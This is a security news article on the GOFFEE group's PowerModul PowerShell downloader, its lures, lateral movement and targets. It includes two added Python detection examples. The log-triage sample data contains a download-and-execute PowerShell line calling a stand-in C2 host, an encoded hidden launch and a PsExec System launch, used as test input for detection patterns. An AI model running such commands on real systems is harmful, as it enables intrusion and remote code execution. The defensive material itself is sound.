Cyber Security News

GOFFEE Deploys PowerModul in Coordinated Strikes on Government and Energy Networks

The threat actor known as GOFFEE has launched a series of targeted attacks against critical sectors within the Russian Federation, utilizing advanced malware and phishing techniques.

The group’s latest campaign deploys PowerModul, a PowerShell-based implant, to extend its intrusion capabilities and carry out coordinated strikes.

PowerModul and Initial Infection Vectors

PowerModul has been identified as a pivotal component in GOFFEE’s latest arsenal, functioning as a downloader capable of fetching and executing additional malicious PowerShell scripts from its command and control (C2) server.

According to the report, this evolution marks a strategic shift: the group is seeking to maintain persistence and evade detection more effectively.

  • RAR Archive Scheme: One of the infection vectors involves a RAR archive file, which contains a patched Windows executable (often explorer.exe or xpsrchvw.exe) masquerading as a document. Upon execution, this file downloads and displays a decoy document to distract the user, while in the background, it drops malicious payloads like PowerModul.
Figure: example of decoy document
  • Microsoft Word Document Scheme: Another approach uses a Microsoft Word document with an embedded macro which, when enabled, starts a chain of processes that ends with the installation of PowerModul. The macro is concealed behind a warning message that prompts the user to enable content, so user interaction is required to trigger it, which the attackers rely on to raise the infection rate.
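Both lures above are caught by cheap content checks on what comes out of the archive: a document-looking filename sitting on top of a PE image, and an OOXML container that carries a VBA project. The following is an added example of such a triage check, written for this page and not taken from the report or from any vendor tool; the document-extension list, the finding names, and the in-memory sample files are all constructed assumptions.

```python
import io
import zipfile

# Extensions a lure file typically poses under (assumed list, not from the report).
DOCUMENT_EXTENSIONS = {".doc", ".docx", ".docm", ".rtf", ".pdf", ".xls", ".xlsx", ".odt", ".txt"}
PE_MAGIC = b"MZ"          # DOS stub header that opens every Windows PE image
ZIP_MAGIC = b"PK\x03\x04"  # local file header that opens a ZIP / OOXML container


def _extensions(name: str) -> list[str]:
    """All dotted suffixes of a name, last first: 'a.pdf.exe' -> ['.exe', '.pdf']."""
    parts = name.lower().split(".")
    return ["." + p for p in reversed(parts[1:])]


def classify_lure(name: str, data: bytes) -> list[str]:
    """Return findings for one extracted file (empty list means nothing noteworthy)."""
    findings = []
    exts = _extensions(name)
    last = exts[0] if exts else ""
    if data.startswith(PE_MAGIC):
        # A PE image named like a document (the patched explorer.exe / xpsrchvw.exe style lure).
        if last in DOCUMENT_EXTENSIONS:
            findings.append("pe-image-with-document-extension")
        # A PE image hiding behind a double extension such as Invoice.pdf.exe (assumed variant).
        elif len(exts) > 1 and exts[1] in DOCUMENT_EXTENSIONS:
            findings.append("pe-image-with-double-extension")
    elif data.startswith(ZIP_MAGIC):
        # Office Open XML files are ZIP containers; a VBA project inside means macro code.
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = zf.namelist()
        except zipfile.BadZipFile:
            findings.append("unreadable-zip-container")
            return findings
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            findings.append("ooxml-with-vba-project")
    return findings


def scan_archive_members(members: dict[str, bytes]) -> dict[str, list[str]]:
    """Map each member name to its findings, keeping only members that produced one."""
    report = {}
    for name, data in members.items():
        findings = classify_lure(name, data)
        if findings:
            report[name] = findings
    return report


def _ooxml(with_macro: bool) -> bytes:
    """Build a minimal constructed OOXML container in memory, optionally with a VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 stub")
    return buf.getvalue()


# Constructed sample archive contents; the PE bytes are a stub header, not a real program.
FAKE_PE = PE_MAGIC + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 64
SAMPLE_MEMBERS = {
    "Contract_2025.docx": FAKE_PE,          # PE image posing as a Word document
    "Invoice.pdf.exe": FAKE_PE,             # PE image behind a double extension
    "Agenda.docm": _ooxml(with_macro=True),  # Word file carrying a VBA project
    "Minutes.docx": _ooxml(with_macro=False),
    "Notice.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
}

if __name__ == "__main__":
    for name, findings in scan_archive_members(SAMPLE_MEMBERS).items():
        print(f"{name}: {', '.join(findings)}")
```

The check deliberately trusts the first bytes of the file rather than the name: the lure described above is a genuine Windows executable, so its PE header survives whatever name it is given inside the archive.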

Execution Flow and Lateral Movement

Upon initial infection, PowerModul’s execution involves several steps:

  • Decoy Display: A decoy document is shown to the victim, diverting attention from the malicious activities running concurrently.
  • Malware Execution: The malicious process starts by executing shellcode embedded within the patched executable. This code then communicates with GOFFEE’s C2 server to fetch further PowerShell scripts or commands.
  • PowerShell Script Execution: PowerModul executes these scripts, potentially downloading secondary implants like PowerTaskel, FlashFileGrabber, or a USB Worm, each designed for distinct purposes such as data theft or network propagation.
Figure: USB Worm main routine
  • Lateral Movement: To expand its foothold, PowerModul can employ techniques for privilege escalation, using tools like PsExec to run processes with System privileges, thereby facilitating deep lateral movement across the network.

Targeted Sectors and Attribution

The campaign has been particularly aggressive against:

  • Media and Telecommunications: Critical for information dissemination and connectivity.
  • Construction: Where access to blueprints and facility designs could compromise national security.
  • Government Entities: Likely aimed at extracting sensitive government data or disrupting operations.
  • Energy Companies: Targeting these could result in significant economic and political disruption.

Given the consistent victimology, the use of PowerTaskel, and the similar infection vectors observed in previous campaigns, security experts attribute these attacks to GOFFEE with high confidence.

The strategic deployment of PowerModul indicates GOFFEE’s intent to sustain long-term presence within targeted networks, potentially for espionage, sabotage, or data theft. Here are some defense strategies:

  • Endpoint Protection: Deploy robust endpoint protection solutions capable of detecting and neutralizing PowerShell-based threats.
  • User Training: Educate employees on the dangers of enabling content in documents and the importance of scrutinizing email attachments.
  • Network Segmentation: Implement network segmentation to limit the lateral movement capabilities of intruding malware.
  • Regular Updates: Ensure all systems are up-to-date with the latest security patches to reduce vulnerabilities.
  • Active Monitoring: Utilize advanced threat detection tools to continuously monitor for unusual activities, especially PowerShell script executions.
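The last point, monitoring PowerShell script executions, is concrete enough to show in code. Below is an added example of triage logic run over PowerShell script block log records (the text Windows records in event 4104 when script block logging is enabled); it is written for this page and is not the report's or any vendor's detection content. The pattern lists reflect the behaviour the article describes, a downloader that fetches and runs further scripts and a PsExec launch as System, but they are assumptions, not published PowerModul indicators; the hostnames, the domains under .invalid and the log records are constructed.

```python
import re

# Primitives a PowerShell downloader needs: something that fetches text, then something
# that evaluates it. Assumed patterns, not indicators taken from the report.
DOWNLOAD_PATTERNS = [
    r"Net\.WebClient", r"DownloadString\s*\(", r"DownloadFile\s*\(",
    r"Invoke-WebRequest", r"\biwr\b", r"Invoke-RestMethod", r"\birm\b",
    r"Start-BitsTransfer",
]
EXECUTE_PATTERNS = [r"Invoke-Expression", r"\biex\b", r"\[scriptblock\]::Create\s*\("]
# -EncodedCommand and its short forms followed by a base64 blob.
ENCODED_PATTERN = r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}"
# PsExec invoked with -s, which runs the target process as the System account.
PSEXEC_SYSTEM_PATTERN = r"\bpsexec(?:64)?(?:\.exe)?\b.*\s-s\b"

SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2}


def _any(patterns: list[str], text: str) -> bool:
    return any(re.search(p, text, re.IGNORECASE) for p in patterns)


def score_script_block(script: str) -> dict:
    """Classify one logged script block: returns {'severity': ..., 'flags': [...]}."""
    flags = []
    downloads = _any(DOWNLOAD_PATTERNS, script)
    executes = _any(EXECUTE_PATTERNS, script)
    if downloads and executes:
        flags.append("download-and-execute")   # fetch-then-evaluate, the downloader shape
    elif downloads:
        flags.append("download-only")          # common in admin scripts, low on its own
    if re.search(ENCODED_PATTERN, script, re.IGNORECASE):
        flags.append("encoded-command")
    if re.search(PSEXEC_SYSTEM_PATTERN, script, re.IGNORECASE):
        flags.append("psexec-as-system")

    if "download-and-execute" in flags:
        severity = "high"
    elif "encoded-command" in flags or "psexec-as-system" in flags:
        severity = "medium"
    elif "download-only" in flags:
        severity = "low"
    else:
        severity = "none"
    return {"severity": severity, "flags": flags}


def triage(records: list[dict]) -> list[dict]:
    """Score every 4104 record and return the hits, most severe first (input order on ties)."""
    hits = []
    for rec in records:
        if rec.get("event_id") != 4104:
            continue
        result = score_script_block(rec["script"])
        if result["severity"] != "none":
            hits.append({"host": rec["host"], **result})
    return sorted(hits, key=lambda h: SEVERITY_RANK[h["severity"]])


# Constructed sample records in the shape of exported script block log events.
SAMPLE_EVENTS = [
    {"event_id": 4104, "host": "ws-finance-03",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage2.ps1')"},
    {"event_id": 4104, "host": "ws-dev-07",
     "script": "Get-ChildItem C:\\Users -Recurse | Measure-Object"},
    {"event_id": 4104, "host": "ws-hr-11",
     "script": "powershell.exe -nop -w hidden -EncodedCommand QQBCAEMA"},
    {"event_id": 4104, "host": "srv-file-01",
     "script": r"psexec.exe \\srv01 -s cmd.exe /c whoami"},
    {"event_id": 4104, "host": "ws-it-02",
     "script": "Invoke-WebRequest -Uri https://updates.example.invalid/x.zip -OutFile C:\\temp\\x.zip"},
    {"event_id": 4103, "host": "ws-it-02", "script": "ignored: not a script block record"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['severity']:<6} {hit['host']:<14} {', '.join(hit['flags'])}")
```

Script block logging has to be turned on for event 4104 to exist at all (Windows records it under the Microsoft-Windows-PowerShell/Operational log); the scoring separates a plain download from a download that is immediately evaluated, because the former is routine in administration while the latter is the exact shape of the downloader described above.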

For organizations seeking more information or assistance with incident response, Kaspersky’s threat intelligence team is available at intelreports@kaspersky.com.


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cybercrime, malware, and vulnerabilities.
